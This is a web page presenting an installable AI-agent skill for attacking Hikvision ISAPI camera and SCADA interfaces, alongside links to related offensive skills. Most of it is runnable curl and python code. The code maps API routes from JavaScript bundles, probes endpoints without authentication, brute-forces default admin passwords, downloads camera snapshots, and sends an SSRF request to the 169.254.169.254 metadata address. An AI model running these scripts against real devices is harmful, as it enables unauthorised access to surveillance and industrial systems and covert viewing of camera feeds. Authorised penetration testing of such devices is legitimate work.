بنقرة واحدة
scada-hikvision-isapi
Enumerate Hikvision ISAPI endpoints on SCADA and IoT web interfaces.
التثبيت باستخدام Codex أو Claude انسخ هذا Prompt والصقه في Codex أو Claude أو مساعد آخر ليراجع صفحة Skill ويثبّتها لك.
القائمة
Enumerate Hikvision ISAPI endpoints on SCADA and IoT web interfaces.
التثبيت باستخدام Codex أو Claude انسخ هذا Prompt والصقه في Codex أو Claude أو مساعد آخر ليراجع صفحة Skill ويثبّتها لك.
Attack SAML SSO via XSW, signature strip, metadata extract.
Chain multiple vulns into critical impact attack paths.
Execute optimal kill chains for WordPress full compromise.
Escape Docker containers to host root via 5 techniques.
Catalog: 25 attacks, 18 WP, 8 CORS to match findings.
7-phase pentest pipeline from passive recon to exploitation.
| name | scada-hikvision-isapi |
| description | Enumerate Hikvision ISAPI endpoints on SCADA and IoT web interfaces. |
| version | 1.0.0 |
| author | uphiago |
| license | MIT |
| platforms | ["linux"] |
| compatibility | Requires curl, nmap, python3 |
| metadata | {"tags":["recon","SCADA","Hikvision","ISAPI","IoT","camera","RTSP","ONVIF","industrial"],"category":"recon","related_skills":["port-service-discovery","hunt-ssrf","iot-camera-recon","js-secrets-extraction"]} |
Enumerate Hikvision ISAPI (Intelligent Security Application Programming Interface) endpoints on industrial control and surveillance web interfaces. Hikvision devices and HikCentral Professional deployments expose a rich REST/XML API at predictable paths. While most endpoints require authentication (CAS session token, Basic auth, or Digest auth), unauthenticated enumeration reveals the device type, firmware baseline, available modules, and potential attack surface. JavaScript bundles often contain the full ISAPI route tree.
/ISAPI/, Bumblebee, or Streaming/channels.Common/common.js, Common/components.js, or Common/vendorGraph.js from a relative path.terminal tool with curl, python3, and nmap.# Fingerprint the web interface
curl -skI "https://TARGET:PORT/" | grep -iE "server|x-powered"
# Download the main JS bundle and scan for ISAPI endpoints
curl -sk "https://TARGET:PORT/" | grep -oP 'src="([^"]+\.js[^"]*)"' | while read -r match; do
js_url=$(echo "$match" | grep -oP '(\./[^"]+\.js[^"]*|/[^"]+\.js[^"]*)')
[ -n "$js_url" ] && curl -sk "https://TARGET:PORT$js_url" | grep -oP '/ISAPI/[^"'\''\s]{5,80}' | sort -u
done
Hikvision web clients embed the complete API route tree in JavaScript:
# Download all JS files referenced in the main page
curl -sk "https://TARGET:PORT/" | python3 -c "
import sys, re, requests, urllib3
urllib3.disable_warnings()
html = sys.stdin.read()
base = 'https://TARGET:PORT'
# Find all JS files
scripts = set(re.findall(r'(?:src|href)=\"([^\"]+\.js[^\"]*)\"', html))
for js in scripts:
url = js if js.startswith('http') else f'{base}{js}' if js.startswith('/') else f'{base}/{js}'
try:
r = requests.get(url, verify=False, timeout=10)
if r.status_code == 200:
# Extract ISAPI paths
paths = set(re.findall(r'/ISAPI/[A-Za-z0-9_/]+', r.text))
if paths:
print(f'\n{url} ({len(r.text)} bytes):')
for p in sorted(paths)[:30]:
print(f' {p}')
except: pass
"
Test extracted ISAPI paths without authentication:
ISAPI_PATHS=(
"/ISAPI/Bumblebee/Platform/V0/KeepLive"
"/ISAPI/Bumblebee/Platform/V0/CAS/SlaveSession"
"/ISAPI/Bumblebee/Platform/V1/RecentlyVisitedMenu"
"/ISAPI/Bumblebee/Platform/V1/SystemConfig/SceneConfig"
"/ISAPI/Bumblebee/Platform/V0/LogicalResource/CameraElements/"
"/ISAPI/Bumblebee/DeviceResource/V0/Servers/RecordServers/"
"/ISAPI/Bumblebee/DeviceResource/V1/PhysicalResource/Devices/"
"/ISAPI/Bumblebee/Platform/V1/Storage/LocalCloudStorageConfig"
"/ISAPI/Bumblebee/Platform/V1/Permission/Security/UserPermission"
"/ISAPI/Bumblebee/Platform/V0/RSM/Sites/"
"/ISAPI/Streaming/channels/101/picture"
"/ISAPI/ContentMgmt/StreamingProxy/channel/"
"/ISAPI/ContentMgmt/download"
)
for path in "${ISAPI_PATHS[@]}"; do
response=$(curl -sk -w "\n%{http_code}" "https://TARGET:PORT$path" 2>/dev/null)
code=$(echo "$response" | tail -1)
body=$(echo "$response" | head -n -1)
echo "=== $path ($code) ==="
echo "$body" | head -5
# Decode error codes
if echo "$body" | grep -q "ErrorCode"; then
error=$(echo "$body" | grep -oP 'ErrorCode\"?\s*[:\s]*(\d+)' | grep -oP '\d+')
case $error in
216) echo " → SESSION_ERROR (auth required)";;
401) echo " → UNAUTHORIZED";;
403) echo " → FORBIDDEN";;
404) echo " → NOT_FOUND";;
*) echo " → Code $error";;
esac
fi
done
Test common credential patterns:
# XML-based CAS session login
curl -sk -X POST "https://TARGET:PORT/ISAPI/Bumblebee/Platform/V0/CAS/SlaveSession" \
-H "Content-Type: application/xml" \
-d '<?xml version="1.0" encoding="UTF-8"?>
<SessionLogin xmlns="http://www.isapi.org/ver20/XMLSchema" version="2.0">
<userName>admin</userName>
<password>PASSWORD</password>
<sessionList><session><id>1</id></session></sessionList>
</SessionLogin>'
# JSON-based login
curl -sk -X POST "https://TARGET:PORT/ISAPI/Bumblebee/Platform/V0/User/Login" \
-H "Content-Type: application/json" \
-d '{"userName":"admin","password":"PASSWORD"}'
# Test default passwords
for pw in admin 12345 123456 password admin123 Hikvision123 hikvision; do
code=$(curl -sk -o /dev/null -w "%{http_code}" \
"https://TARGET:PORT/ISAPI/Bumblebee/Platform/V0/KeepLive" \
-u "admin:$pw")
[ "$code" != "401" ] && echo "Basic auth: admin:$pw → $code"
done
If camera channels are accessible:
# Try camera snapshots (channel 1-16)
for ch in 1 101 201 301; do
curl -sk "https://TARGET:PORT/ISAPI/Streaming/channels/$ch/picture" \
-o "camera_$ch.jpg"
[ -s "camera_$ch.jpg" ] && echo "Snapshot ch$ch: $(wc -c < camera_$ch.jpg) bytes"
done
# Check for RTSP streaming info
curl -sk "https://TARGET:PORT/ISAPI/Streaming/channels/" | head -20
# ONVIF service discovery
curl -sk -X POST "https://TARGET:PORT/onvif/device_service" \
-H "Content-Type: application/soap+xml" \
-d '<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope">
<s:Body><GetServices xmlns="http://www.onvif.org/ver10/device/wsdl"/>
</s:Body></s:Envelope>'
Prioritize these endpoints which may enable SSRF, data access, or privilege escalation:
# HTTP pass-through (potential SSRF)
curl -sk -X POST "https://TARGET:PORT/ISAPI/Bumblebee/Platform/V1/DAM/HTTPPassThrough" \
-H "Content-Type: application/json" \
-d '{"url":"http://169.254.169.254/"}'
# Cloud storage configuration exposure
curl -sk "https://TARGET:PORT/ISAPI/Bumblebee/Platform/V1/Storage/LocalCloudStorageConfig"
# User permission enumeration
curl -sk "https://TARGET:PORT/ISAPI/Bumblebee/Platform/V1/Permission/Security/UserPermission"
# Remote site management
curl -sk "https://TARGET:PORT/ISAPI/Bumblebee/Platform/V0/RSM/Sites/"
ws://127.0.0.1: for local WebSocket connections. External WebSocket endpoints may use different ports.nmap -sU -p 554 for UDP RTSP detection.port-service-discovery — Detecting Hikvision/RTSP/ONVIF ports.hunt-ssrf — Exploiting the HTTPPassThrough proxy for SSRF.iot-camera-recon — General IP camera reconnaissance patterns.js-secrets-extraction — Extracting API keys and tokens from JS bundles that may authenticate ISAPI requests.